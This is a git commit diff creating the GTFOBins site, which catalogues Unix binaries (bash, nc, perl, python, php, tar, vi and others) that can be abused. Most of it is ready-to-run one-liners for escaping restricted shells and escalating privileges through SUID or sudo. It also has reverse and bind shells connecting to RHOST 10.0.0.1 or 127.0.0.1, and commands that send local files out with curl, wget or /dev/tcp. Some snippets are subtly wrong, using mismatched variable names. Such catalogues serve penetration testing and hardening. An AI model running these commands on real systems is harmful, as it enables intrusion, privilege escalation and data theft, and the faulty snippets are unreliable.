commit b81e57005a8fe36a5fb537cc713147ffc68ffb30 Author: Emilio Pinna Date: Mon May 21 20:14:41 2018 +0100 First commit diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..5d88aff --- /dev/null +++ b/.gitignore @@ -0,0 +1,3 @@ +/_tmp/ +/.sass-cache/ +/_site/ diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md new file mode 100644 index 0000000..2cad4c1 --- /dev/null +++ b/CONTRIBUTING.md @@ -0,0 +1,3 @@ +# Contributing + +TODO link to website URL diff --git a/Gemfile b/Gemfile new file mode 100644 index 0000000..e8a7006 --- /dev/null +++ b/Gemfile @@ -0,0 +1,3 @@ +source 'https://rubygems.org' + +gem 'jekyll' diff --git a/Gemfile.lock b/Gemfile.lock new file mode 100644 index 0000000..a29f77d --- /dev/null +++ b/Gemfile.lock @@ -0,0 +1,63 @@ +GEM + remote: https://rubygems.org/ + specs: + addressable (2.5.2) + public_suffix (>= 2.0.2, < 4.0) + colorator (1.1.0) + concurrent-ruby (1.0.5) + em-websocket (0.5.1) + eventmachine (>= 0.12.9) + http_parser.rb (~> 0.6.0) + eventmachine (1.2.7) + ffi (1.9.23) + forwardable-extended (2.6.0) + http_parser.rb (0.6.0) + i18n (0.9.5) + concurrent-ruby (~> 1.0) + jekyll (3.8.1) + addressable (~> 2.4) + colorator (~> 1.0) + em-websocket (~> 0.5) + i18n (~> 0.7) + jekyll-sass-converter (~> 1.0) + jekyll-watch (~> 2.0) + kramdown (~> 1.14) + liquid (~> 4.0) + mercenary (~> 0.3.3) + pathutil (~> 0.9) + rouge (>= 1.7, < 4) + safe_yaml (~> 1.0) + jekyll-sass-converter (1.5.2) + sass (~> 3.4) + jekyll-watch (2.0.0) + listen (~> 3.0) + kramdown (1.16.2) + liquid (4.0.0) + listen (3.1.5) + rb-fsevent (~> 0.9, >= 0.9.4) + rb-inotify (~> 0.9, >= 0.9.7) + ruby_dep (~> 1.2) + mercenary (0.3.6) + pathutil (0.16.1) + forwardable-extended (~> 2.6) + public_suffix (3.0.2) + rb-fsevent (0.10.3) + rb-inotify (0.9.10) + ffi (>= 0.5.0, < 2) + rouge (3.1.1) + ruby_dep (1.5.0) + safe_yaml (1.0.4) + sass (3.5.6) + sass-listen (~> 4.0.0) + sass-listen (4.0.0) + rb-fsevent (~> 0.9, >= 0.9.4) + rb-inotify (~> 0.9, >= 0.9.7) + +PLATFORMS + ruby + +DEPENDENCIES + jekyll + +BUNDLED WITH + 1.16.1 diff --git a/Makefile b/Makefile new file mode 100644 index 0000000..1eb5840 --- /dev/null +++ b/Makefile @@ -0,0 +1,10 @@ +.PHONY: serve bundle + +serve: + bundle exec jekyll serve + +serve-public: + bundle exec jekyll serve --host 0.0.0.0 + +bundle: + bundle install diff --git a/README.md b/README.md new file mode 100644 index 0000000..7ca02aa --- /dev/null +++ b/README.md @@ -0,0 +1,3 @@ +# GTFOBins + +TODO link to website URL diff --git a/_config.yml b/_config.yml new file mode 100644 index 0000000..ef0dac5 --- /dev/null +++ b/_config.yml @@ -0,0 +1,15 @@ +title: GTFOBins + +exclude: ['/Gemfile', '/Makefile', '/README.md', '/CONTRIBUTING.md'] + +permalink: pretty + +collections: + gtfobins: + output: true + +defaults: + - scope: + path: '_gtfobins' + values: + layout: bin diff --git a/_data/functions.yml b/_data/functions.yml new file mode 100644 index 0000000..354081e --- /dev/null +++ b/_data/functions.yml @@ -0,0 +1,39 @@ +exec-interactive: + label: Interactive + description: It executes interactive commands that may be exploited to break out from restricted shells. + +exec-non-interactive: + label: Non-interactive + description: It executes non-interactive commands that may be exploited to break out from restricted shells. + +suid-enabled: + label: SUID + description: It runs with the SUID bit set and may be exploited to escalate or maintain the privileges working as a SUID backdoor. + +suid-limited: + label: Limited SUID + description: It runs with the SUID bit set and may be exploited to escalate or maintain the privileges working as a SUID backdoor. Its functioning depends on the default operating systems system shell and tipically works only on Debian Linux. + +sudo-enabled: + label: Sudo + description: It runs in privileged contexts and may be used to escalate or maintain privileges if enabled on `sudo`. + +download: + label: Download + description: It can download remote files. + +upload: + label: Upload + description: It can exfiltrate files on the network. + +bind-shell: + label: Bind shell + description: It can bind a shell to a local port to allow remote network access. + +reverse-shell: + label: Reverse shell + description: It can send back a reverse shell to a listening attacker to open a remote network access. + +load-library: + label: Library load + description: It loads shared libraries that may be used to run code in the binary execution context. diff --git a/_gtfobins/awk.md b/_gtfobins/awk.md new file mode 100644 index 0000000..c0ccd9f --- /dev/null +++ b/_gtfobins/awk.md @@ -0,0 +1,9 @@ +--- +functions: + exec-interactive: + - code: awk 'BEGIN {system("/bin/sh")}' + sudo-enabled: + - code: sudo awk 'BEGIN {system("/bin/sh -p")}' + suid-limited: + - code: ./awk 'BEGIN {system("/bin/sh -p")}' +--- \ No newline at end of file diff --git a/_gtfobins/bash.md b/_gtfobins/bash.md new file mode 100644 index 0000000..9504070 --- /dev/null +++ b/_gtfobins/bash.md @@ -0,0 +1,40 @@ +--- +functions: + exec-interactive: + - code: bash + sudo-enabled: + - code: sudo bash + suid-enabled: + - code: ./bash -p + upload: + - description: Send local file in the body of an HTTP POST request. + code: | + RHOST=10.0.0.1 + RPORT=8000 + LFILE=file_to_send + echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT + - description: Send local file using a TCP connection. + code: | + RHOST=10.0.0.1 + RPORT=8000 + LFILE=file_to_send + cat $LFILE > /dev/tcp/$RHOST/$RPORT + download: + - description: Fetch a remote file via HTTP GET request. + code: | + RHOST=10.0.0.1 + RPORT=8000 + LFILE=file_to_get + (echo -e "GET /$LFILE HTTP/0.9\r\n\r\n" 1>&3 & cat 0<&3) 3<>/dev/tcp/$RHOST/$RPORT | (read i; while [ "$(echo $i | tr -d '\r')" != "" ]; do read i; done; cat) > $LFILE + - description: Fetch remote file using a TCP connection. + code: |- + RHOST=10.0.0.1 + RPORT=8000 + LFILE=file_to_get + bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1 > $LFILE + reverse-shell: + - code: | + RHOST=127.0.0.1 + RPORT=8000 + exec 5<&-;exec 5<>/dev/tcp/$RHOST/$RPORT;while read line 0<&5; do $line 2>&5 >&5; done +--- diff --git a/_gtfobins/csh.md b/_gtfobins/csh.md new file mode 100644 index 0000000..d4ea657 --- /dev/null +++ b/_gtfobins/csh.md @@ -0,0 +1,9 @@ +--- +functions: + exec-interactive: + - code: csh + sudo-enabled: + - code: sudo csh + suid-enabled: + - code: ./csh -b +--- \ No newline at end of file diff --git a/_gtfobins/curl.md b/_gtfobins/curl.md new file mode 100644 index 0000000..05e8083 --- /dev/null +++ b/_gtfobins/curl.md @@ -0,0 +1,15 @@ +--- +functions: + upload: + - description: Send local file with an HTTP POST request. + code: | + URL=http://10.0.0.1/ + LFILE=file_to_send + curl -X POST -d @$file_to_send $URL + download: + - description: Fetch a remote file via HTTP GET request. + code: |- + export URL=http://10.0.0.1/file_to_get + export LFILE=file_to_get + curl $URL -o $LFILE +--- \ No newline at end of file diff --git a/_gtfobins/ed.md b/_gtfobins/ed.md new file mode 100644 index 0000000..aeae566 --- /dev/null +++ b/_gtfobins/ed.md @@ -0,0 +1,15 @@ +--- +functions: + exec-interactive: + - code: | + ed + !/bin/sh + sudo-enabled: + - code: | + sudo ed + !/bin/sh + suid-limited: + - code: |- + ./ed + !/bin/sh -p +--- \ No newline at end of file diff --git a/_gtfobins/emacs.md b/_gtfobins/emacs.md new file mode 100644 index 0000000..5f7a9db --- /dev/null +++ b/_gtfobins/emacs.md @@ -0,0 +1,9 @@ +--- +functions: + exec-interactive: + - code: emacs -Q -nw --eval '(term "/bin/sh")' + sudo-enabled: + - code: sudo emacs -Q -nw --eval '(term "/bin/sh")' + suid-enabled: + - code: ./emacs -Q -nw --eval '(term "/bin/sh -p")' +--- \ No newline at end of file diff --git a/_gtfobins/env.md b/_gtfobins/env.md new file mode 100644 index 0000000..b47eac4 --- /dev/null +++ b/_gtfobins/env.md @@ -0,0 +1,9 @@ +--- +functions: + exec-interactive: + - code: env /bin/sh + sudo-enabled: + - code: sudo env /bin/sh + suid-enabled: + - code: ./env /bin/sh -p +--- \ No newline at end of file diff --git a/_gtfobins/expect.md b/_gtfobins/expect.md new file mode 100644 index 0000000..f489f86 --- /dev/null +++ b/_gtfobins/expect.md @@ -0,0 +1,9 @@ +--- +functions: + exec-interactive: + - code: expect -c 'spawn /bin/sh;interact' + sudo-enabled: + - code: sudo expect -c 'spawn /bin/sh;interact' + suid-enabled: + - code: ./expect -c 'spawn /bin/sh -p;interact' +--- \ No newline at end of file diff --git a/_gtfobins/find.md b/_gtfobins/find.md new file mode 100644 index 0000000..be88dbf --- /dev/null +++ b/_gtfobins/find.md @@ -0,0 +1,9 @@ +--- +functions: + exec-interactive: + - code: find . -exec /bin/sh \; -quit + sudo-enabled: + - code: sudo find . -exec /bin/sh \; -quit + suid-enabled: + - code: ./find . -exec /bin/sh -p \; -quit +--- \ No newline at end of file diff --git a/_gtfobins/ftp.md b/_gtfobins/ftp.md new file mode 100644 index 0000000..1c65caf --- /dev/null +++ b/_gtfobins/ftp.md @@ -0,0 +1,23 @@ +--- +functions: + exec-interactive: + - code: | + ftp + !/bin/sh + sudo-enabled: + - code: | + sudo ftp + !/bin/sh + upload: + - description: Send local file to a FTP server. + code: | + RHOST=10.0.0.1 + ftp $RHOST + put file_to_send + download: + - description: Fetch a remote file from a FTP server. + code: | + RHOST=10.0.0.1 + ftp $RHOST + get file_to_get +--- \ No newline at end of file diff --git a/_gtfobins/gdb.md b/_gtfobins/gdb.md new file mode 100644 index 0000000..c1bd0fc --- /dev/null +++ b/_gtfobins/gdb.md @@ -0,0 +1,7 @@ +--- +functions: + exec-interactive: + - code: gdb -nx -ex '!sh' -ex quit + sudo-enabled: + - code: sudo gdb -nx -ex '!sh' -ex quit +--- diff --git a/_gtfobins/ionice.md b/_gtfobins/ionice.md new file mode 100644 index 0000000..a5f578e --- /dev/null +++ b/_gtfobins/ionice.md @@ -0,0 +1,9 @@ +--- +functions: + exec-interactive: + - code: ionice /bin/sh + sudo-enabled: + - code: sudo ionice /bin/sh + suid-enabled: + - code: ./ionice /bin/sh -p +--- \ No newline at end of file diff --git a/_gtfobins/ld.so.md b/_gtfobins/ld.so.md new file mode 100644 index 0000000..9a7a5fd --- /dev/null +++ b/_gtfobins/ld.so.md @@ -0,0 +1,10 @@ +--- +description: Ld.so is the Linux dynamic linker/loader. Its file name and location might change between Linux versions. +functions: + exec-interactive: + - code: /lib/ld.so /bin/sh + sudo-enabled: + - code: sudo /lib/ld.so /bin/sh + suid-enabled: + - code: ./ld.so /bin/sh -p +--- diff --git a/_gtfobins/less.md b/_gtfobins/less.md new file mode 100644 index 0000000..ac7855c --- /dev/null +++ b/_gtfobins/less.md @@ -0,0 +1,18 @@ +--- +functions: + exec-interactive: + - code: | + less /etc/profile + !/bin/sh + - code: | + VISUAL="/bin/sh -c '/bin/sh'" less /etc/profile + v + sudo-enabled: + - code: | + sudo less /etc/profile + !/bin/sh + suid-limited: + - code: |- + ./less /etc/profile + !/bin/sh -p +--- \ No newline at end of file diff --git a/_gtfobins/man.md b/_gtfobins/man.md new file mode 100644 index 0000000..f0d9f0c --- /dev/null +++ b/_gtfobins/man.md @@ -0,0 +1,15 @@ +--- +functions: + exec-interactive: + - code: | + man man + !/bin/sh + sudo-enabled: + - code: | + sudo man man + !/bin/sh + suid-limited: + - code: |- + ./man man + !/bin/sh -p +--- \ No newline at end of file diff --git a/_gtfobins/more.md b/_gtfobins/more.md new file mode 100644 index 0000000..2986954 --- /dev/null +++ b/_gtfobins/more.md @@ -0,0 +1,15 @@ +--- +functions: + exec-interactive: + - code: | + TERM= more /etc/profile + !/bin/sh + sudo-enabled: + - code: | + TERM= sudo -E more /etc/profile + !/bin/sh + suid-limited: + - code: |- + TERM= ./more /etc/profile + !/bin/sh -p +--- \ No newline at end of file diff --git a/_gtfobins/nc.md b/_gtfobins/nc.md new file mode 100644 index 0000000..e427a9e --- /dev/null +++ b/_gtfobins/nc.md @@ -0,0 +1,25 @@ +--- +functions: + upload: + - description: Serve a file on a TCP port. + code: | + RHOST=10.0.0.1 + RPORT=8000 + LFILE=file_to_send + nc $RHOST $RPORT < "$LFILE" + download: + - description: Fetch remote file from a remote TCP port. + code: |- + LPORT=8000 + LFILE=file_to_get + nc -l -p $LPORT > "$LFILE" + reverse-shell: + - code: | + RHOST=10.0.0.1 + RPORT=8000 + nc -e /bin/sh $RHOST $RPORT + bind-shell: + - code: | + LPORT=8000 + nc -lp $LPORT -e /bin/sh +--- diff --git a/_gtfobins/perl.md b/_gtfobins/perl.md new file mode 100644 index 0000000..2b7efcc --- /dev/null +++ b/_gtfobins/perl.md @@ -0,0 +1,14 @@ +--- +functions: + exec-interactive: + - code: perl -e 'exec "/bin/sh";' + sudo-enabled: + - code: sudo perl -e 'exec "/bin/sh";' + suid-enabled: + - code: ./perl -e 'exec "/bin/sh";' + reverse-shell: + - code: | + export RHOST=127.0.0.1 + export RPORT=12346 + perl -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' +--- \ No newline at end of file diff --git a/_gtfobins/php.md b/_gtfobins/php.md new file mode 100644 index 0000000..ec45cf7 --- /dev/null +++ b/_gtfobins/php.md @@ -0,0 +1,39 @@ +--- +functions: + exec-non-interactive: + - code: | + export CMD="ls /" + php -r 'system($_ENV["CMD"]);' + - code: | + export CMD="ls /" + php -r 'passthru($_ENV["CMD"]);' + - code: | + export CMD="ls /" + php -r 'print(shell_exec($_ENV["CMD"]));' + - code: | + export CMD="ls /" + php -r '$r=array(); exec($_ENV["CMD"], $r); print(join(\"\\n\",$r));' + - code: | + export CMD="ls /" + php -r '$h=@popen($_ENV["CMD"],"r"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }' + - code: | + export CMD="ls /" + php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe", "w"));$h = @proc_open($_ENV["CMD"], $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}' + upload: + - description: Serve files in the local folder running an HTTP server. + code: | + LHOST=0.0.0.0 + LPORT=8888 + php -S $LHOST:$LPORT + download: + - description: Fetch a remote file via HTTP GET request. + code: |- + export URL=http://10.0.0.1/file_to_get + export LFILE=file_to_get + php -r '$c=file_get_contents($_ENV["URL"]);file_put_contents($_ENV["LFILE"], $c);' + reverse-shell: + - code: | + export RHOST=127.0.0.1 + export RPORT=8000 + php -r '$sock=fsockopen($_ENV["RHOST"],$_ENV["RPORT"]);exec("/bin/sh -i <&3 >&3 2>&3");' +--- \ No newline at end of file diff --git a/_gtfobins/python2.md b/_gtfobins/python2.md new file mode 100644 index 0000000..0a679df --- /dev/null +++ b/_gtfobins/python2.md @@ -0,0 +1,32 @@ +--- +functions: + exec-interactive: + - code: python -c 'import os; os.system("/bin/sh")' + sudo-enabled: + - code: sudo python -c 'import os; os.system("/bin/sh")' + suid-enabled: + - code: ./python -c 'import os; os.system("/bin/sh -p")' + upload: + - description: Send local file via "d" parameter of a HTTP POST request. + code: | + export URL=http://10.0.0.1/ + export LFILE=file_to_send + python -c 'import urllib as u,urllib2 as u2,os.environ as e; u2.urlopen(u2.Request(e["URL"],u.urlencode({"d":open(e["LFILE"]).read()})))' + - description: Serve files in the local folder running an HTTP server. + code: | + export LPORT=8888 + python -m SimpleHTTPServer $LPORT + download: + - description: Fetch a remote file via HTTP GET request. + code: |- + export URL=http://10.0.0.1/file_to_get + export LFILE=file_to_get + python -c 'import urllib as u,os.environ as e;u.urlretrieve(e["URL"], e["LFILE"])' + reverse-shell: + - code: | + export RHOST=127.0.0.1 + export RPORT=8000 + python -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")' + load-library: + - code: python -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")' +--- \ No newline at end of file diff --git a/_gtfobins/python3.md b/_gtfobins/python3.md new file mode 100644 index 0000000..2effa86 --- /dev/null +++ b/_gtfobins/python3.md @@ -0,0 +1,32 @@ +--- +functions: + exec-interactive: + - code: python3 -c 'import os; os.system("/bin/sh")' + sudo-enabled: + - code: sudo python3 -c 'import os; os.system("/bin/sh")' + suid-enabled: + - code: ./python3 -c 'import os; os.system("/bin/sh -p")' + upload: + - description: Send local file via "d" parameter of a HTTP POST request. + code: | + export URL=http://10.0.0.1/ + export LFILE=file_to_send + python3 -c 'import urllib.request as r,urllib.parse as u;from os import environ as e; r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))' + - description: Serve files in the local folder running an HTTP server. + code: | + LPORT=8888 + python3 -m http.server $LPORT + download: + - description: Fetch a remote file via HTTP GET request. + code: | + export URL=http://10.0.0.1/file_to_get + export LFILE=file_to_get + python3 -c 'import urllib.request as u;from os import environ as e; u.urlretrieve (e["URL"], e["LFILE"])' + reverse-shell: + - code: | + export RHOST=127.0.0.1 + export RPORT=8000 + python3 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")' + load-library: + - code: python3 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")' +--- diff --git a/_gtfobins/rpm.md b/_gtfobins/rpm.md new file mode 100644 index 0000000..c4cb4ab --- /dev/null +++ b/_gtfobins/rpm.md @@ -0,0 +1,9 @@ +--- +functions: + exec-interactive: + - code: rpm --eval '%{lua:posix.exec("/bin/sh")}' + sudo-enabled: + - code: sudo rpm --eval '%{lua:posix.exec("/bin/sh")}' + suid-enabled: + - code: ./rpm --eval '%{lua:posix.exec("/bin/sh", "-p")}' +--- \ No newline at end of file diff --git a/_gtfobins/rpmquery.md b/_gtfobins/rpmquery.md new file mode 100644 index 0000000..de73d72 --- /dev/null +++ b/_gtfobins/rpmquery.md @@ -0,0 +1,9 @@ +--- +functions: + exec-interactive: + - code: rpmquery --eval '%{lua:posix.exec("/bin/sh")}' + sudo-enabled: + - code: sudo rpmquery --eval '%{lua:posix.exec("/bin/sh")}' + suid-enabled: + - code: ./rpmquery --eval '%{lua:posix.exec("/bin/sh", "-p")}' +--- \ No newline at end of file diff --git a/_gtfobins/ruby.md b/_gtfobins/ruby.md new file mode 100644 index 0000000..9fb7b09 --- /dev/null +++ b/_gtfobins/ruby.md @@ -0,0 +1,19 @@ +--- +functions: + exec-interactive: + - code: ruby -e 'exec "/bin/sh"' + sudo-enabled: + - code: sudo ruby -e 'exec "/bin/sh"' + reverse-shell: + - code: | + export RHOST=10.0.0.1 + export RPORT=8000 + ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' + load-library: + - code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")' + upload: + - description: Serve files in the local folder running an HTTP server. + code: | + export LPORT=8888 + ruby -run -e httpd . -p $LPORT +--- \ No newline at end of file diff --git a/_gtfobins/scp.md b/_gtfobins/scp.md new file mode 100644 index 0000000..326368d --- /dev/null +++ b/_gtfobins/scp.md @@ -0,0 +1,36 @@ +--- +functions: + exec-non-interactive: + - code: | + TF=$(mktemp) + CMD="touch /tmp/unrestricted" + echo "$CMD" > "$TF" + chmod +x "$TF" + scp -S $TF x y: + sudo-enabled: + - code: | + TF=$(mktemp) + CMD="touch /tmp/unrestricted" + echo "$CMD" > "$TF" + chmod +x "$TF" + sudo scp -S $TF x y: + suid-limited: + - code: | + TF=$(mktemp) + CMD="touch /tmp/unrestricted" + echo "$CMD" > "$TF" + chmod +x "$TF" + ./scp -S $TF a b: + upload: + - description: Send local file to a SSH server. + code: | + RPATH=user@10.0.0.1:~/where_to_save + LPATH=file_to_send + scp $LFILE $RPATH + download: + - description: Fetch a remote file from a SSH server. + code: | + RPATH=user@10.0.0.1:~/file_to_get + LFILE=where_to_save + scp $RPATH $LFILE +--- diff --git a/_gtfobins/setarch.md b/_gtfobins/setarch.md new file mode 100644 index 0000000..f7e596a --- /dev/null +++ b/_gtfobins/setarch.md @@ -0,0 +1,9 @@ +--- +functions: + exec-interactive: + - code: setarch $(arch) /bin/sh + sudo-enabled: + - code: setarch $(arch) /bin/sh + suid-enabled: + - code: ./setarch $(arch) /bin/sh -p +--- \ No newline at end of file diff --git a/_gtfobins/ssh.md b/_gtfobins/ssh.md new file mode 100644 index 0000000..b1f9767 --- /dev/null +++ b/_gtfobins/ssh.md @@ -0,0 +1,20 @@ +--- +functions: + exec-interactive: + - description: Reconnecting may help bypassing restricted shells. + code: ssh localhost /bin/bash --noprofile --norc + download: + - description: Fetch a remote file from a SSH server. + code: | + HOST=user@10.0.0.1 + RPATH=file_to_get + LPATH=where_to_save + ssh $HOST "cat $RPATH" > $LPATH + upload: + - description: Send local file to a SSH server. + code: | + HOST=user@10.0.0.1 + RPATH=where_to_save + LPATH=file_to_send + ssh $HOST "cat > $RPATH" < $LPATH +--- diff --git a/_gtfobins/strace.md b/_gtfobins/strace.md new file mode 100644 index 0000000..7479a82 --- /dev/null +++ b/_gtfobins/strace.md @@ -0,0 +1,9 @@ +--- +functions: + exec-interactive: + - code: strace -o /dev/null /bin/sh + sudo-enabled: + - code: sudo strace -o /dev/null /bin/sh + suid-enabled: + - code: ./strace -o /dev/null /bin/sh -p +--- \ No newline at end of file diff --git a/_gtfobins/tar.md b/_gtfobins/tar.md new file mode 100644 index 0000000..f9ada95 --- /dev/null +++ b/_gtfobins/tar.md @@ -0,0 +1,10 @@ +--- +functions: + exec-interactive: + - code: tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh + sudo-enabled: + - code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh + suid-limited: + - code: ./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec="/bin/sh + -p" +--- \ No newline at end of file diff --git a/_gtfobins/taskset.md b/_gtfobins/taskset.md new file mode 100644 index 0000000..813d4a2 --- /dev/null +++ b/_gtfobins/taskset.md @@ -0,0 +1,9 @@ +--- +functions: + exec-interactive: + - code: taskset 1 /bin/sh + sudo-enabled: + - code: sudo taskset 1 /bin/sh + suid-enabled: + - code: ./taskset 1 /bin/sh -p +--- \ No newline at end of file diff --git a/_gtfobins/tclsh.md b/_gtfobins/tclsh.md new file mode 100644 index 0000000..e36598f --- /dev/null +++ b/_gtfobins/tclsh.md @@ -0,0 +1,15 @@ +--- +functions: + exec-interactive: + - code: | + tclsh + exec /bin/sh <@stdin >@stdout 2>@stderr + sudo-enabled: + - code: | + sudo tclsh + exec /bin/sh <@stdin >@stdout 2>@stderr + suid-enabled: + - code: | + ./tclsh + exec /bin/sh -p <@stdin >@stdout 2>@stderr +--- \ No newline at end of file diff --git a/_gtfobins/telnet.md b/_gtfobins/telnet.md new file mode 100644 index 0000000..3240601 --- /dev/null +++ b/_gtfobins/telnet.md @@ -0,0 +1,34 @@ +--- +functions: + exec-interactive: + - code: | + RHOST=www.google.com + RPORT=80 + telnet $RHOST $RPORT + ^] + !/bin/sh + description: MacOS only. + reverse-shell: + - code: | + RHOST=127.0.0.1 + RPORT=8000 + TF=$(mktemp) + rm $TF + mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/bash 1>$TF + sudo-enabled: + - code: | + RHOST=www.google.com + RPORT=80 + sudo telnet $RHOST $RPORT + ^] + !/bin/sh + description: MacOS only. + suid-limited: + - code: | + RHOST=www.google.com + RPORT=80 + ./telnet $RHOST $RPORT + ^] + !/bin/sh + description: MacOS only. +--- diff --git a/_gtfobins/tftp.md b/_gtfobins/tftp.md new file mode 100644 index 0000000..580f037 --- /dev/null +++ b/_gtfobins/tftp.md @@ -0,0 +1,15 @@ +--- +functions: + upload: + - description: Send local file to a TFTP server. + code: | + RHOST=10.0.0.1 + tftp $RHOST + put file_to_send + download: + - description: Fetch a remote file from a TFTP server. + code: | + RHOST=10.0.0.1 + tftp $RHOST + get file_to_get +--- \ No newline at end of file diff --git a/_gtfobins/vi.md b/_gtfobins/vi.md new file mode 100644 index 0000000..5baf153 --- /dev/null +++ b/_gtfobins/vi.md @@ -0,0 +1,13 @@ +--- +functions: + exec-interactive: + - code: vi -c ':!/bin/sh' + - code: | + vi + :set shell=/bin/sh + :shell + sudo-enabled: + - code: sudo vi -c ':!/bin/sh' + suid-enabled: + - code: ./vi -c ':!/bin/sh -p' +--- \ No newline at end of file diff --git a/_gtfobins/wget.md b/_gtfobins/wget.md new file mode 100644 index 0000000..b4ab2d8 --- /dev/null +++ b/_gtfobins/wget.md @@ -0,0 +1,15 @@ +--- +functions: + upload: + - description: Send base64-encoded local file via "d" parameter of a HTTP POST request. + code: | + export URL=http://10.0.0.1/ + export LFILE=file_to_send + wget --post-data="d=$(base64 $LFILE | tr -d '\n')" $URL + download: + - description: Fetch a remote file via HTTP GET request. + code: |- + export URL=http://10.0.0.1/file_to_get + export LFILE=file_to_get + wget $URL -O $LFILE +--- \ No newline at end of file diff --git a/_gtfobins/wish.md b/_gtfobins/wish.md new file mode 100644 index 0000000..44e08d5 --- /dev/null +++ b/_gtfobins/wish.md @@ -0,0 +1,11 @@ +--- +functions: + exec-interactive: + - code: | + wish + exec /bin/sh <@stdin >@stdout 2>@stderr + sudo-enabled: + - code: | + sudo wish + exec /bin/sh <@stdin >@stdout 2>@stderr +--- \ No newline at end of file diff --git a/_gtfobins/zsh.md b/_gtfobins/zsh.md new file mode 100644 index 0000000..acd3330 --- /dev/null +++ b/_gtfobins/zsh.md @@ -0,0 +1,9 @@ +--- +functions: + exec-interactive: + - code: zsh + sudo-enabled: + - code: sudo zsh + suid-enabled: + - code: ./zsh +--- \ No newline at end of file diff --git a/_includes/bin_table.html b/_includes/bin_table.html new file mode 100644 index 0000000..263a052 --- /dev/null +++ b/_includes/bin_table.html @@ -0,0 +1,57 @@ + + +
+ + + + + + + + +{% for file in site.gtfobins %} + + + + +{% endfor %} + + + + +
BinaryFunctions
{% include get_bin_name path=file.path %}{% include function_list.html bin=file %}
No binary matches...
+
+ + diff --git a/_includes/function_list.html b/_includes/function_list.html new file mode 100644 index 0000000..89d9b27 --- /dev/null +++ b/_includes/function_list.html @@ -0,0 +1,6 @@ + diff --git a/_includes/functions_description.html b/_includes/functions_description.html new file mode 100644 index 0000000..3492afb --- /dev/null +++ b/_includes/functions_description.html @@ -0,0 +1,7 @@ +
+{% for function_pair in site.data.functions %} +{% assign function = function_pair[1] %} +
{{ function.label }}
+
{{ function.description | markdownify }}
+{% endfor %} +
diff --git a/_includes/get_bin_name b/_includes/get_bin_name new file mode 100644 index 0000000..dda1301 --- /dev/null +++ b/_includes/get_bin_name @@ -0,0 +1 @@ +{% assign fn_parts = include.path | split: '/' | last | split: '.' %}{% assign fn_parts_size = fn_parts | size %}{% if fn_parts_size < 3 %}{{- fn_parts[0] -}}{% else %}{{- fn_parts[0] -}}.{{- fn_parts[1] -}}{% endif %} \ No newline at end of file diff --git a/_includes/page_title.html b/_includes/page_title.html new file mode 100644 index 0000000..df8efdb --- /dev/null +++ b/_includes/page_title.html @@ -0,0 +1,6 @@ +

+ {% if page.url != '/' %} + .. / + {% endif %} + {{ include.title }} +

diff --git a/_layouts/bin.html b/_layouts/bin.html new file mode 100644 index 0000000..92caa10 --- /dev/null +++ b/_layouts/bin.html @@ -0,0 +1,46 @@ +--- +layout: common +--- + +{% capture bin_name %}{% include get_bin_name path=page.path %}{% endcapture %} + +{% include page_title.html title=bin_name %} + +{% include function_list.html bin=page %} + +{{ page.description | markdownify }} + +{% for function in page.functions %} + +{% assign function_name = function[0] %} +{% assign examples = function[1] %} + +

+{{- site.data.functions[function_name].label -}} +

+ +{{ site.data.functions[function_name].description | markdownify }} + +{% for example in examples %} + +
+{{ example.description | markdownify }} + +{% capture code %} +{%- if function_name == 'suid-enabled' or function_name == 'suid-limited' %} +cp $(which {{ bin_name }}) . +sudo chown 0 ./{{ bin_name }} +sudo chmod +s ./{{ bin_name }} +{% endif %} +{{ example.code }} +{% endcapture %} + +

+{{- code | strip -}}
+
+ +
+ +{% endfor %} + +{% endfor %} diff --git a/_layouts/common.html b/_layouts/common.html new file mode 100644 index 0000000..6a5cdf0 --- /dev/null +++ b/_layouts/common.html @@ -0,0 +1,22 @@ + + + + + + {{ site.title }} + {% if page.url != '/' %} + | + {% if page.layout == 'bin' %} + {{ page.title | downcase }} + {% else %} + {{ page.title }} + {% endif %} + {% endif %} + + + + + +{{ content }} + + diff --git a/_layouts/page.html b/_layouts/page.html new file mode 100644 index 0000000..76d6025 --- /dev/null +++ b/_layouts/page.html @@ -0,0 +1,7 @@ +--- +layout: common +--- + +{% include page_title.html title=page.title %} + +{{ content }} diff --git a/contribute.md b/contribute.md new file mode 100644 index 0000000..9455417 --- /dev/null +++ b/contribute.md @@ -0,0 +1,45 @@ +--- +layout: page +title: Contribute +--- + +## Structure + +Each GTFO binary is defined in a file in the `_gtfobins/` folder named as `.md`, such file consists only of a [YAML] front matter which describes the binary and its functions. + +[YAML]: http://yaml.org/ + +The full syntax is the following: + +``` +description: Optional description of the binary +functions: + FUNCTION: + - description: Optional description of the example + code: Code of the example + - .... + FUNCTION: + - description: 